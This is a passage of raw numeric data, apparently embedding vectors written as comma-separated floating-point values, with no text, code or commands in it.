,-0.020347944,0.009259682,-0.006266695,-0.008413592,0.039182004,-0.013073517,-0.023331871,-0.01574075,0.0036636044,0.0042728484,0.018465502,0.029536946,-0.004960594,-0.0044571836,-0.021676581,-0.011186391,0.0014619994,0.027290355,0.03346672,-0.004158982,-0.00008710082,-0.0028292767,0.012176735,-0.0051149353,-0.0066649304,0.0015833054,0.014782923,0.001006398,0.046587642,0.0133983735,0.005655004,0.007551752,-0.0016201993,0.009327084,0.03718685,-0.024910973,0.021090146,-0.021025954,0.012929893,0.022237409,0.0038372718,-0.0067658266,-0.015539034,0.0043900544,0.012073227,0.010390465,0.010877112,0.021476977,-0.019986426,0.00776541,0.000547282,-0.017146766,0.015000763,-0.0061751194,-0.0043286337,0.0019797564,0.011124207,-0.028027473,0.009968465,0.02399497,0.011338962,-0.005061703,0.006322712,-0.0035715303,-0.016896494,-0.02704049,0.019721482,-0.0076887095,-0.03153459,0.016246755,-0.003466351,-0.006946798,0.015813813,-0.025252834,0.00030477214,0.0010328424,0.029410142,0.029909495,0.008043338,-0.007154448,0.01446584,-0.01135387,0.0031267914,-0.000987,-0.012579997,0.0005064052,-0.005716998,0.004940643,-0.0176903,-0.014015142,-0.004005617,-0.013442714,-0.017103912,0.022535425,-0.005395218,0.006547772,-0.012759118,-0.011868273,0.011375464,0.017685127,-0.0068137497,0.005217415,0.008785098,0.007816096,0.016539646,0.004344282,0.012623191,-0.029391157,-0.018455883,-0.0032769782,0.0018051212,-0.019248776,-0.0012747871,0.018988661,0.0088550085,-0.017786505,0.00618227,0.009521332,-0.02577638,-0.00781322,-0.016112825,0.0025492886,0.0044011697,-0.009721215,-0.008816422,0.03985351,-0.0012806805,0.011531159,0.017696558,0.015472629,-0.037951287,-0.0005546685,0.012422904,0.013913382,0.06407184,-0.0035515076,0.000086706954,0.030882575,-0.021541856,0.021358287,0.017835937,0.020003749,0.006953747,0.017704986,0.0033468006,0.033158634,-0.01137431,-0.0034541208,-0.0008929882,0.022046369,0.002213917,0.02124976,0.013725419,-0.013225729,-0.000115838324,-0.008212289,0.030322025,0.004929149,0.023043029,-0.032285023,0.0030541637,-0.008194421,0.0017446105,-0.032504242,-0.004680425,-0.007109331,-0.0021968049,-0.01279721,-0.009318137,-0.0015027114,0.012917805,-0.0074116075,-0.003171356,-0.0016150053,-0.0057019973,-0.012448292,-0.00152499,-0.026855769,-0.05457264,0.0149547,0.01275619,-0.0060600764,0.002234845,-0.0011659059,-0.019880181,0.004876718,-0.019240987,0.003012145,-0.02198444,-0.016631197,-0.0028886097,0.019427046,0.03343806,-0.008386788,0.0037418457,-0.031052614,0.018664224,0.0031552974,-0.003152998,0.024364686,0.0058064424,-0.0052478886,-0.0022505727,-0.009188574,0.0006641887,-0.009905022,-0.028007692,0.015044876,0.011937046,-0.0017564421,-0.0017597162,-0.0019097225,0.003016928,-0.0036597578,-0.00014951774,-0.0073532984,0.0066645197,-0.013560968,-0.01445023,0.002637055,0.011217956,-0.00972991,0.012873675,0.017316492,-0.018096235,-0.008897348,-0.009915336,0.016510895,-0.00203448,0.028112656,-0.012541482,0.024940288,0.019342056,0.014065507,0.0064272443,-0.0060127177,0.027278202,0.0018701871,-0.023196122,-0.010621157,0.015173689,-0.005404726,-0.012887618,0.006005654,0.001623587,0.029431114,-0.010585947,0.004806258,0.010224981,-0.01890953,-0.009912012,0.02018731,-0.00014408673,0.030151578,-0.013377202,-0.0012364719,0.0014469984,0.01057952,-0.023727799,-0.014679037,0.006750017,0.011541855,-0.0033265762,0.014822768,0.00937325,0.032631926,0.01910585,0.017882021,0.015539274,0.0084205065,0.0026344114,0.0024405338,-0.01967093,0.026832702,-0.0122702075,-0.0036466392,0.022416135,0.013676727,-0.017009676,-0.00009204111,0.01529639,-0.031146854,0.012413259,-0.0018042433,0.007790123,0.019566521,0.012601605,0.004116904,-0.013155035,0.034727607,0.009123772,0.028566947,0.018870978,0.023496952,-0.012538091,0.012005248,-0.014972183,0.026246691,-0.012575557,-0.0046893964,0.0047567976,0.010940893,0.01651758,-0.013116412,0.008495208,-0.016277257,-0.009574517,-0.007220172,-0.008881178,0.020990718,0.008307148,0.04034748,0.0031216429,-0.009024806,0.021928774,-0.005614168,-0.014598306,-0.004103664,0.00339348,-0.02047856,-0.009515466,-0.010952835,0.012035908,0.046539176,-0.0056410683,-0.02176675,-0.0073396824,-0.008803004,-0.0041714376,-0.00733839,0.004501089,0.020671224,-0.0046539716,-0.007992134,0.010895847,-0.0080539035,0.005082748,-0.010235996,0.0025356465,0.013215876,0.00008594909,0.023487085,-0.00498331,0.0017562095,0.01583595,0.010987396,0.0049874024,-0.039606716,0.004984862,-0.0031116968,0.001961227,0.0066737602,-0.012761537,-0.008066363,0.020176703,0.005237563,0.008515531,-0.0063971123,-0.0139070125,-0.0049365107,-0.0051526963,0.0008672258,-0.013616449,-0.0021540325,0.004259507,-0.000257945,-0.011521769,-0.018250747,-0.020749478,-0.023924254,0.004560857,0.0358803,-0.0022576775,-0.01575497,0.010378802,0.012800297,-0.011859037,0.022243742,-0.014621285,0.02488045,0.012785584,0.011887526,0.0058471765,0.0015921433,0.0077978517,-0.018951666,-0.0061339615,0.008855307,0.014887012,0.004737576,0.0039253184,0.07294322,-0.00002533901,-0.011704696,0.0009254339,0.0026299143,-0.0005614705,0.025263252,0.01757595,0.017535627,0.030144013,-0.0021080752,-0.007114678,-0.0009474918,-0.009963409,-0.005280498,0.012205564,0.024293132,0.01099163,0.004503224,-0.0047923448,0.03084818,-0.02739181,-0.004735202,0.037468072,0.013337087,-0.046568044,0.006040121,0.034252476,-0.0061555747,0.0184042,-0.00046879717,0.018293543,0.034642477,-0.011162747,-0.010953865,-0.0058598714,0.01500967,-0.0025887392,-0.005009322,-0.009492929,0.0152749065,0.006931185,0.023808079,-0.0064905253,-0.033972643,0.000017375269,-0.006113564,0.00035591106,0.0062480676,-0.015216544,0.0075319177,0.015112625,0.017913457,-0.0052136634,0.00017828555,-0.005518833,-0.0021413714,-0.0021900574,-0.004070731,-0.0022132853,0.031282224,-0.010409761,-0.00722388,0.004853341,0.019086456,0.014345986,-0.018349014,-0.0048199445,-0.069180764,-0.042741,0.026470194,-0.022031663,0.0030507576,-0.005554514,-0.011631811,-0.009054452,-0.0018130273,-0.013683024,-0.036159977,0.001846297,0.013670271,0.0060929465,0.012134754,-0.0015427324,0.025355564,0.0087065715,-0.013176561,-0.007109569,-0.01013075,-0.004113726,0.019279547,-0.009208023,0.008827861,-0.0070753186,-0.035895806,-0.00311719,0.012544454,-0.03071009,0.010138293,0.0008635731,0.0035416316,0.001512449,-0.003186587,-0.012445256,-0.02207636,-0.018170407,-0.0017179074,0.008242263,0.0011349384,-0.00447379,0.008094051,-0.0059381886,0.0076620798,0.0140092,0.005495817,0.0034885148,-0.008928668,-0.017181272,0.007624306,-0.008050455,0.0073260246,0.012292587,0.0066642286,0.038588773,0.010212303,0.026719093,-0.004015033,-0.0041420874,0.036404204,-0.019338688,0.00009307139,-0.03756794,-0.0014902597,-0.006305033,-0.0008700688,0.00031074169,0.028695203,0.0032120494,0.02063035,0.009510299,-0.0022532954,0.004217402,-0.01687217,-0.0024373524,-0.012534602,0.002238073,0.03252406,-0.010578938,0.024097314,0.014421518,-0.013227204,0.0012421864,0.006152104,-0.005106316,-0.0006580354,-0.014190077,0.010212969,-0.008974962,-0.035735983,-0.0026296857,0.014048886,0.0044180853,0.00059916236,-0.031347852,0.0035494266,-0.00680329,0.00791763,-0.006080061,-0.010057899,0.015706357,0.005834548,-0.00411615,0.010988811,0.013268615,0.010117432,0.01155638,0.016288575,0.009039201,0.0000506967,-0.006508246,-0.008356025,0.027399136,-0.014244917,0.021872729,0.016193625,-0.017496878,-0.018999638,0.0012688584,0.004651036,0.025069287,-0.022421105,0.020471789,0.0013539328,0.006003187,0.0060757324,0.00973558,-0.030761275,0.04073554,-0.0041461,-0.045042995,-0.024655795,-0.00033880223,0.005740581,-0.004028384,0.009898352,-0.01119703,0.0053752083,-0.017324831,-0.020085676,-0.0025421656,0.00037903065,0.0061531677,-0.004637254,-0.00330637,0.004350025,0.022223871,-0.033756435,0.0036694438,-0.003781116,-0.005925199,0.004493623,-0.01342876,-0.017758511,0.0015270029,0.012620913,-0.005224265,0.0018068646,0.015203429,-0.000047057678,0.0059475033,0.011622465,0.012006536,-0.020609975,-0.021874936,0.013154435,-0.00037861036,0.017854301,0.02223989,-0.010245016,0.016225504,0.0033088776,-0.011929609,0.0016663634,-0.017436411,-0.020251393,-0.013549149,0.03111539,-0.008634335,-0.0037584554,-0.02468265,-0.017949319,-0.0023633183,-0.014960158,-0.00909991,-0.025840571,0.005598919,-0.004278415,0.03257895,-0.0015890844,-0.0146684395,-0.0013966971,-0.0061548804,0.015394485,0.027528165,-0.007687286,-0.010467001,0.026238035,-0.0044896128,-0.021022623,-0.005194622,-0.01434526,0.015732208,-0.025595801,0.0072442456,-0.029230367,0.024850488,-0.007611098,0.011273721,-0.0017574372,0.015330381,-0.004615018,-0.032397628,0.017781246,-0.01694916,0.01087147,0.00094048196,0.03987271,0.008410557,0.027905649,-0.040220685,0.003129493,0.056794465,0.00036305693,-0.018119719,-0.0010561532,-0.014877976,-0.07588015,-0.016708953,0.0341168,-0.017939884,-0.0011477483,-0.030208742,0.011049467,0.0035157732,-0.01172728,-0.009860579,0.012899431,-0.0014232991,-0.0075449483,0.033468142,-0.005083857,0.0039221686,0.009632013,-0.00074088847,-0.011328377,-0.033451878,-0.00018389922,-0.0010294627,-0.022400415,-0.004145166,0.0099006705,-0.017411895,0.011697819,-0.00810258,0.013207547,-0.032749046,0.0078024277,0.012004022,-0.015101439,-0.013567481,0.018716319,-0.017052263,0.004246378,-0.013573213,0.0009931421,-0.0077702343,-0.00705719,0.14377668,0.018609034,-0.0064587668,-0.014197501,0.00979853,-0.013733828,-0.0020327491,0.013540102,0.008841131,0.010142237,-0.018783424,0.0028084023,0.023711964,0.015012116,0.019162184,-0.015804416,-0.0042406744,0.115962684,0.025082909,0.015193146,0.0014805695,-0.00082143734,0.030551793,0.013879922,0.01939041,-0.032071758,0.016067488,-0.013931127,-0.008811521,-0.016266705,-0.0073236027,0.006088477,-0.015861128,0.005009562,-0.00714803,0.011690621,-0.013496664,-0.011091326,-0.038598396,-0.022386314,0.00752086,-0.027492933,0.0008930867,0.013606485,0.00506127,0.010202047,-0.0076173833,-0.013104081,0.023498889,0.041044153,0.022214763,-0.02669461,0.0055423114,-0.0022564575,0.020350108,0.015932359,0.007649555,0.0025599755,-0.034729812,0.03226081,0.0010096738,-0.007189125,-0.013029305,0.013002492,-0.031217307,-0.007395983,0.0018564651,-0.01902912,-0.012824347,0.017233228,-0.003923206,0.00084093516,-0.022406584,0.008843192,0.011617675,-0.0071606794,-0.003989231,-0.014647622,0.027034774,-0.018632827,0.01747054,0.039766647,-0.03354386,0.0075965184,0.026774792,0.01310877,0.010200591,-0.0027372118,-0.0049962974,0.008239647,-0.0041283,0.0040498474,0.0034317647,-0.012942463,-0.03023143,0.026330983,-0.0012788073,0.008081229,-0.0013301172,-0.017360097,-0.0068981987,0.033977978,-0.009941416,0.003254052,0.025923394,0.024438675,-0.0003966237,0.006673805,-0.0026157363,-0.0016847876,0.0035908748,0.01909735,-0.0065258597,-0.006005116,-0.024578601,-0.016716875,0.0161239,0.040088,-0.013720344,0.00092275196,-0.009199251,-0.008141349,0.025076192,-0.0047804955,-0.022626417,0.0114111835,-0.0013387664,-0.0016441646,-0.029852504,0.006416002,-0.008523145,-0.007499581,0.03710069,0.00684142,0.0019386876,-0.015141053,0.0030638122,-0.021384565,-0.012665959,-0.008378322,-0.007304252,0.029886506,-0.0008195288,-0.0065248073,-0.0037616654,0.013541389,0.009923331,-0.0006951231],[-0.0122009525,-0.0025920616,-0.001714466,-0.007213753,0.0075332336,0.00003821919,-0.0027422432,0.0015048858,-0.0046631065,-0.0053985263,0.014398669,0.019243808,-0.0074946727,0.0030701552,-0.012116399,-0.0024520012,0.0057278313,-0.013696903,0.0057081063,0.009713991,0.0072617736,-0.010162776,-0.016654454,0.020305248,-0.014383372,0.012804597,-0.0016007425,-0.008063088,-0.0014635405,-0.012994275,0.017616436,0.0099987,-0.0042731254,0.00051481684,0.000016791191,0.00970219,0.0021904805,-0.004318972,0.015179887,-0.008372499,0.007199607,0.008862485,-0.01572123,0.00360615,-0.005239488,-0.007790563,-0.019215297,0.0066968417,0.0055157724,-0.0008164869,-0.008635268,0.0014700997,-0.01734708,-0.0018850544,0.0031013244,-0.0073838863,-0.006802121,-0.010092295,0.025502503,-0.0041854694,-0.023132697,0.020273464,-0.025987143,0.0035299966,0.007961274,-0.011214868,0.015632864,-0.0048331227,-0.016091036,0.00307473,0.030915799,0.00020614002,-0.012196961,-0.0035186186,-0.0064501963,0.009085505,-0.0014218998,-0.013667122,-0.013639003,-0.013758082,-0.03131127,0.012568872,0.020119406,-0.029625576,-0.014126054,-0.026360244,-0.00027753634,-0.013559672,-0.010516195,-0.00844967,-0.0028006614,-0.0029618007,-0.015098011,-0.0073697465,-0.005891706,0.014036708,0.030891472,-0.015630595,0.01948398,0.0038966467,0.002684523,-0.021251597,-0.01240255,0.0018045072,-0.004706223,-0.006430436,-0.019222341,0.025939062,0.00059737376,0.009850392,-0.00038417516,0.0015368309,0.010578617,-0.00029812587,-0.0021809912,-0.013084175,0.002370857,-0.00070574484,-0.012231439,0.008640338,0.019619102,-0.031944904,0.025710713,-0.00586308,0.0015985346,-0.008431738,0.011667339,0.003244185,-0.005417114,-0.011261919,0.008841497,0.019036055,-0.0036068652,-0.0025944104,0.024904199,-0.019437347,-0.0040749847,0.015463032,0.017322207,-0.0137903355,-0.0045149964,0.0147453295,0.03457214,0.015339934,0.018646266,0.0035263596,0.0025823063,0.010883213,0.024893807,0.0017142462,0.01790225,0.04206123,0.010725712,0.0028174454,0.00886948,0.0071873213,0.0020746826,-0.0072882744,-0.011344622,0.0056394,0.007132573,-0.017146345,-0.011900592,0.023274895,0.017520785,-0.015694192,-0.013514486,0.00874362,0.016524434,-0.005038392,-0.006897211,0.01536089,-0.0075790607,0.01024035,-0.004780884,-0.00550846,-0.00096763496,-0.01696704,-0.00698209,-0.003297757,0.0006055506,0.03136051,-0.00014898245,-0.0004980287,-0.01132909,0.007904692,-0.0015015568,0.0162249,-0.012388565,0.029733025,-0.0014282202,-0.014423749,0.008735807,-0.003327272,-0.012690533,0.014665426,-0.0049835728,0.1425198,-0.010745908,-0.015430878,-0.021709358,-0.003356241,0.009106246,-0.004052338,-0.011672347,0.0074062278,-0.019514106,-0.0001713755,0.0032223254,-0.01288231,-0.0036973953,-0.0101615945,0.018878268,0.014297,-0.0012668129,-0.08013981,0.0072712144,0.0017595405,-0.018177219,0.016716652,0.0015573086,-0.019791191,-0.030425936,0.00911138,0.0013482259,0.0067747086,0.016794039,0.014679948,-0.010867696,-0.020569555,0.016231177,0.017925097,-0.025976717,-0.008484538,0.014053824,-0.019848064,0.00870233,0.018557219,-0.00801327,-0.0034697982,0.01217545,0.0042826813,0.0061884113,0.00215666,0.006421881,-0.0007807678,0.008166335,0.009610196,0.00045024572,-0.0054761586,0.003047781,-0.00055531296,-0.010886444,0.018048774,0.011220362,-0.0025250728,-0.010571909,0.01518949,0.010228452,-0.005414431,-0.007624215,0.024124198,-0.015134245,0.019811008,0.026213776,0.014293347,0.015742483,-0.031813942,-0.017155798,0.004783495,-0.041898,-0.010262572,0.002893396,-0.029017033,0.01750363,0.0037393135,0.022981068,0.003883488,0.026865605,0.013332013,0.002518291,-0.01292011,0.0003738195,-0.023523495,-0.03227519,-0.02679405,-0.0005680835,0.0059563187,0.024992703,-0.010793025,-0.01740392,-0.018572565,0.019704064,0.0067342026,0.00205583,-0.032072533,-0.0188357,0.013231913,0.0039684516,-0.012338274,0.013292257,-0.019187761,0.014091585,0.0047793216,-0.0010089801,0.0020915822,0.0055468255,0.011860581,0.036163557,-0.009809988,0.025906524,-0.008761903,0.0077998457,-0.006525242,-0.008160591,-0.001911121,0.011978347,-0.0050755194,0.0075233625,-0.015035328,0.005229377,0.0056621907,-0.0028419818,0.013394727,-0.010563157,-0.012674825,0.04592782,-0.006121045,-0.0142980525,0.0012918774,0.017589146,-0.009743565,0.007813609,0.017668394,-0.022848185,0.009471239,0.0066480204,-0.0026308175,-0.002470035,0.028864007,-0.00062279287,-0.014882177,0.021497115,-0.014561172,0.00062488,0.01879656,0.0010074959,-0.01037539,0.00870987,0.021611001,-0.0071101696,-0.010281399,0.008260255,0.0071435515,-0.029227566,0.015918637,-0.028738912,-0.00065616006,0.01382817,-0.004088455,0.023207575,-0.009014932,0.03558447,-0.0109482035,0.103318244,0.020597832,0.010626294,0.011914083,-0.0027229474,-0.022260096,0.020511242,0.0016692972,0.002452263,0.0052081943,0.00980965,-0.015250709,-0.017240863,0.038748644,0.020069718,-0.0033869431,-0.017599631,0.01606777,0.0012487634,-0.01692235,0.0003952467,-0.0040535703,-0.03142597,0.012819651,0.017802998,-0.00006941258,-0.005536808,-0.010199098,0.0028698624,-0.00083762885,0.0015158752,-0.018816328,-0.009294328,-0.0043386,-0.02068516,-0.0054265843,0.014184441,-0.016476281,0.0028915443,-0.004923085,-0.010398044,-0.0011242633,-0.029139178,0.0053878184,-0.005512408,0.009390411,0.0011741892,0.0030148416,0.0049616094,0.003055336,0.01045511,0.028481817,-0.012761794,0.038150627,-0.0049775816,0.008824528,0.014076989,-0.020953817,-0.0059997607,-0.00094070606,0.030726857,0.005780529,-0.023066996,0.038905304,0.000120545534,0.019901633,-0.0028240941,-0.013575052,-0.022306092,0.0015247876,-0.013189689,0.012226317,0.019969158,0.0036024062,-0.01909118,-0.0029148585,-0.005370424,0.0062442916,-0.021804865,0.01573894,-0.0014319195,0.023177152,-0.0056538587,0.0013486522,-0.023762733,0.009927615,-0.0019205872,0.011170488,0.00703697,-0.003929462,0.018092781,-0.0030064501,0.016355919,-0.014700048,0.014413881,-0.03754489,0.01336594,-0.031115249,-0.003746017,0.0032377776,-0.029486405,0.0019547592,0.0194899,0.016330013,-0.01842271,-0.0045259586,0.018390525,-0.011690114,0.0009443554,-0.0026547774,-0.012557732,-0.005268716,-0.007261623,0.0010018138,0.002789177,-0.0011734652,0.010682471,0.02211068,-0.00030707693,0.012290058,0.012010704,-0.0015730018,-0.0015880042,0.0055989553,-0.011378256,0.04414421,-0.001283199,0.01103555,-0.010782964,0.00711898,0.000104638726,0.008852826,-0.016033951,-0.022966607,-0.022521386,0.0007694867,0.011228973,-0.03591934,0.013641647,0.0006910597,0.0014517971,-0.006748052,0.01207132,0.01780229,0.0011837442,0.029987922,0.015269485,-0.0018686125,0.021750532,0.010992077,0.0026447882,0.00021141281,-0.017419785,-0.017507019,-0.008970133,0.008208467,0.0024078577,-0.013790581,-0.0027012252,-0.020088121,0.0057431124,-0.0017473208,0.020776754,-0.024253352,-0.010104996,-0.02652169,-0.005672984,0.08957896,0.004037759,-0.013071867,0.013476261,0.0069759,0.016393477,0.007133972,0.0020816599,-0.022863187,0.01937122,0.023278693,-0.022880305,0.0020964951,0.008965512,-0.014545757,-0.019528782,0.029794447,0.00047433987,0.0021155449,0.018905615,0.007010499,0.011345085,-0.0044469773,-0.023128258,-0.0090265535,-0.013928169,0.02151243,0.022259183,0.008464469,-0.01922222,0.009782499,0.018541351,-0.0214874,-0.010199856,0.013767915,0.01039585,-0.0037899292,-0.0042340867,-0.0051174723,0.009560443,0.015348257,-0.003664768,0.027919028,-0.0023419284,-0.001168228,-0.012453922,-0.03846915,0.011602881,-0.012920323,-0.023038093,-0.0231147,-0.0006818508,0.012307248,0.0021761921,0.0014137703,-0.011089895,0.01516409,0.01298334,0.0029344116,0.012156814,-0.0030392646,-0.003902386,-0.006307866,-0.00085948943,0.0014986313,-0.020843122,0.017325466,-0.015375161,-0.00545009,-0.0023654168,-0.0017660235,0.01762398,0.021608062,0.008297146,0.010886125,0.016294867,-0.015528556,0.019187288,0.022555415,-0.0141615365,0.01944898,0.020894857,0.0036338386,0.0020697725,0.010304107,-0.0044391714,-0.012436181,-0.0016732685,-0.005057097,-0.016271884,-0.005836357,0.010526841,-0.018287757,0.0039858427,-0.025267323,-0.0076094316,-0.011489978,-0.014495794,0.0011407563,0.00849773,0.0036763265,-0.00877654,-0.02766483,0.023051618,-0.012015502,0.005689322,0.012440117,0.011916107,0.022074135,-0.027692985,-0.012768883,-0.05459711,0.006058265,0.013610146,0.030343749,0.010082525,0.029295165,-0.010057057,0.031064147,-0.012276166,-0.019132013,0.031408437,0.0050135995,0.0020655657,0.015575153,0.028613463,-0.011407208,-0.017205743,-0.015948145,-0.013201004,-0.08228025,0.008762495,0.027592316,-0.00915462,-0.0041546873,-0.0072428966,0.019075412,-0.028725974,-0.0019175451,-0.009311351,0.0054153325,0.0101424595,0.009054432,0.013551305,0.0049324236,-0.009852052,-0.0051678154,-0.001005524,0.019898988,0.010389986,-0.009271251,0.009128604,-0.0023667729,-0.013327508,0.005488551,-0.021009339,0.0143807195,-0.019201875,0.00515225,-0.023967326,0.013369627,0.0064908992,-0.018672613,0.015995199,-0.003065765,0.00701737,0.00050985895,-0.005056371,0.034024466,-0.006611142,-0.022443818,0.007061579,-0.0012868284,0.001026802,-0.03188949,0.014176191,0.008689239,-0.0002047623,0.003115661,-0.02232352,0.0045068916,-0.011289912,0.022085732,0.03932801,0.014922081,0.0009954087,-0.003335036,0.009947064,-0.004224289,0.016659135,-0.0046122195,0.0018719245,-0.045714147,-0.022400185,0.0051540113,-0.014340937,-0.0056042853,-0.0060875337,0.0013192522,0.0077794767,-0.01800889,0.0036095085,-0.0018860733,-0.041772343,-0.0048065376,-0.0036640312,0.0060996036,-0.020325813,-0.025698213,-0.011827762,0.02302038,0.022314068,-0.029166115,-0.016258303,-0.026684776,-0.018852172,-0.0022271816,-0.011256186,0.0005529803,-0.013284811,0.021867247,-0.00762941,0.023965865,-0.0048311115,0.0014229259,0.0058080126,0.029709442,-0.005438057,-0.012640147,0.0016619663,-0.0131506985,0.02082308,0.01457253,-0.02633684,-0.027952258,-0.01494361,-0.017674172,-0.0034688916,-0.032580487,0.0055709765,0.020933663,-0.014671467,-0.000432882,0.010971823,-0.00041707326,-0.01856998,-0.015247219,0.008452259,-0.00247359,-0.012813003,0.009823597,-0.006555145,0.0022223864,-0.013483658,-0.0057365685,0.026317915,0.005251269,0.014483431,0.009324887,-0.0053415727,0.009632396,0.0027167073,0.009007265,-0.028055798,-0.00506355,-0.05929539,0.011328182,0.006523367,-0.0022691512,-0.003034344,0.0016322003,-0.011173154,0.0018716403,-0.007725757,-0.008401491,0.0033892137,-0.007684938,-0.022217115,0.018476192,-0.007122807,0.0151371285,-0.014288617,0.014310024,-0.015455937,-0.020583458,0.005197787,-0.014546756,-0.028976388,-0.0015688777,-0.023312833,-0.010555985,-0.00284403,-0.001470521,-0.009813748,0.009005508,-0.008884164,0.021245185,0.0019001866,0.01911271,-0.0043281205,-0.0032100002,0.0034247607,0.012113526,0.018009856,-0.031325758,0.0012836593,0.0056334073,-0.0021973914,0.02328187,0.015022461,-0.012044332,0.029042283,-0.006430428,-0.01784137,0.016625464,0.02500549,0.006462794,0.013779293,-0.007988717,-0.0037866933,-0.0065881545,-0.007316828,0.008457077,0.0073516476,-0.0020425292,0.035992343,0.020312741,0.0054439516,-0.013621774,-0.0039778827,0.0017293703,0.011391343,0.0051381355,-0.012156745,0.0026464143,0.0064208675,-0.013927776,-0.014561078,0.018832903,0.010211176,0.010702039,0.008837712,-0.0047084866,0.008504795,-0.013740216,-0.000440121,-0.012146821,-0.0016553492,-0.0073082764,-0.009581107,0.006700496,0.0077761705,0.02871057,-0.016511075,-0.0041644056,0.026412586,-0.009444133,-0.002861451,-0.016607892,-0.005461304,-0.009970807,0.008050427,-0.018990649,0.019892452,0.0070573534,0.029797047,0.014500534,0.005490875,-0.008162971,0.006624023,-0.0035200128,0.017230788,-0.00649733,-0.0016877141,-0.010460873,0.005684824,0.002257481,-0.009523393,-0.0025732527,-0.010640304,0.004572527,0.015952585,0.0154789705,-0.013411496,0.02664056,-0.011121987,0.013265647,0.0035652434,-0.020796318,0.04316149,-0.010123356,-0.0042003943,-0.006589564,0.014549864,-0.015921343,0.01722928,-0.01913215,-0.0022370778,0.034073435,-0.0024847446,-0.0050600856,-0.02170165,0.00020392188,-0.006528466,0.0014602401,0.0025553824,-0.010788835,-0.051523853,0.002892534,-0.0016336294,0.01678224,0.008831759,0.007938725,-0.006040642,0.016290916,0.014587402,0.007860002,0.0033932126,-0.029904189,-0.020960575,-0.0069102393,-0.0144728925,-0.02149795,-0.025997521,0.011207187,0.01833715,-0.0125652775,-0.012576123,0.010770637,-0.009045014,-0.027847778,0.021234242,-0.007540897,0.00015390164,0.006721915,0.024385074,0.0014060816,0.019166067,0.012540738,0.016244814,0.0028061264,0.0045425575,-0.019078285,-0.0005236418,0.0017665926,-0.02742655,-0.0016031828,0.00027199415,-0.0008304088,0.0019559327,0.032978646,0.005746388,-0.009254795,-0.009451016,-0.020410832,-0.022471033,-0.011680707,0.019833423,0.0050585084,-0.03176695,0.016986798,-0.014608161,0.008932391,0.0015787143,0.01084644,-0.031098926,-0.017212983,-0.0018140903,0.01254942,-0.019477354,0.017320137,-0.0047395304,-0.016808758,-0.007059448,-0.009066413,0.0112581635,-0.0042087096,0.0099214865,-0.0057905796,0.007339044,0.005207702,0.008813524,0.027001768,0.017405527,-0.008452337,-0.009590987,0.0061562997,0.016518453,0.0067591495,-0.018173914,-0.01921148,-0.0265961,-0.0037934433,-0.004003328,0.0009102269,0.0014150728,-0.016652934,0.011647199,-0.0051611247,0.003939001,0.029164279,-0.0006851768,0.033716798,0.008068691,0.007162383,0.0060664047,-0.00012712654,0.013827507,-0.008227936,-0.043327734,-0.00661133,0.006128235,0.00081027596,-0.020552712,-0.007287419,0.010962184,0.025869222,0.013481592,-0.018491631,-0.0027395603,0.0030682771,0.019734155,-0.011265244,0.0041926075,0.0010538833,0.04508672,-0.0042455904,0.011060594,0.0026316985,-0.01671638,0.0048841755,0.026361888,0.00013716289,0.027168686,0.0045266473,-0.0029558805,-0.016318101,-0.006805893,-0.004943607,-0.022493113,-0.0040373686,0.0049547926,-0.029057888,0.0021510206,-0.02880478,-0.010769022,0.015956322,-0.017138025,-0.022735158,-0.03594862,0.014089859,-0.0010731452,0.0012496642,-0.024989506,0.006335862,0.008731482,-0.00669991,0.011490708,-0.022939222,0.004906674,-0.0048795086,-0.02207634,0.018748652,0.0124905445,-0.012079061,-0.0039541046,-0.005882657,-0.002887281,-0.023076577,-0.0053970106,0.007460972,-0.010586176,0.002978995,0.011362429,0.018529741,0.0017761771,0.012947997,0.015833404,0.0035807842,-0.017507708,0.027813934,0.011874106,-0.021353815,0.0038223632,0.007712837,-0.004006127,0.011716752,-0.010392267,0.0143232485,-0.011020505,0.030687388,-0.008729128,-0.029767128,-0.007990523,-0.018730085,-0.021030497,-0.012015896,-0.006434949,0.0076187784,0.006855397,0.0002149766,-0.00975413,-0.0035450323,-0.0015725245,0.011535914,-0.01295789,0.01784296,-0.029884586,0.0032277794,-0.0023954608,-0.031295918,-0.0119338,0.020088721,0.010978604,-0.023495466,0.015945546,-0.026811566,0.007152494,-0.005687553,-0.020936077,0.016264569,0.0058542183,-0.0011362293,-0.011777887,-0.0061920057,-0.00659975,-0.02255816,0.023235187,0.0023332075,-0.014158935,-0.009690039,-0.010068982,0.0021876895,0.012241489,-0.011292028,0.008749441,0.0062727835,0.015013516,-0.015516749,0.006117378,0.0005400969,-0.029159656,-0.0014870755,-0.0059223254,-0.037095837,-0.023972897,-0.006086162,0.00977007,-0.014734764,0.009838592,0.017771428,0.030464003,0.02929309,-0.015201554,-0.014924092,-0.012840777,0.009005479,0.000060392267,0.0076764994,0.021699475,-0.011129803,-0.026494209,-0.006872063,-0.024014255,-0.0073566837,-0.006332727,-0.026000615,-0.008052797,-0.004687695,0.011768377,0.010305451,0.01291853,-0.0071428134,0.02519735,0.013449703,-0.005851298,-0.022736706,-0.006962365,0.007898738,0.016484866,0.0138246,-0.008836409,-0.0020385173,-0.0011048616,0.00817508,-0.0005897793,-0.005580031,0.015913935,0.0027022066,0.024179554,-0.029471178,-0.00015946032,0.030252272,-0.00031512332,-0.034220822,-0.0055703097,0.005015454,-0.0012367083,0.001011478,0.00072807603,0.00838054,0.020083971,-0.018585803,0.021547787,0.012453558,-0.0031531714,-0.0054938016,-0.001130977,-0.029984724,0.0010936013,0.0038720353,-0.015689515,-0.0002193294,-0.023806999,0.005987509,0.0066458993,-0.0011224507,-0.0061683143,-0.013709778,-0.012503934,-0.026580317,-0.005476183,0.0050750202,0.0063265003,0.0023164705,-0.018869052,0.009835667,-0.00034023804,0.006430433,0.012370248,0.01244326,-0.025423206,0.024478985,0.012815456,0.007340638,-0.045376364,0.014638548,-0.009582449,-0.02001146,-0.048162293,0.014111946,-0.014036737,-0.00031575878,0.0036007646,-0.012806149,0.0004132181,0.014444572,-0.0013716936,-0.014709105,0.07788352,-0.0012616464,-0.00279249,-0.023170542,-0.004422184,0.010473047,0.032182723,-0.020506158,0.0092356,0.026816703,0.0039344733,-0.0024071839,0.005346622,0.00567468,0.0053390632,0.00167595,0.010030787,0.010466637,0.023750369,-0.02753888,0.0016387565,0.0022682927,-0.009110169,-0.003230644,0.015796382,-0.01590476,0.0075815558,-0.010698141,-0.013128801,0.022514028,-0.022391535,-0.014770154,0.010927252,0.0062095053,0.020031158,-0.020568267,-0.006646978,0.017618885,-0.018775284,-0.03371194,0.017993076,-0.005909729,-0.01214491,-0.009843551,0.015785849,-0.021544866,0.08098471,0.030674407,0.015115878,-0.031107128,0.007099116,0.0018701699,-0.03405071,0.011091811,0.006632594,-0.0001081514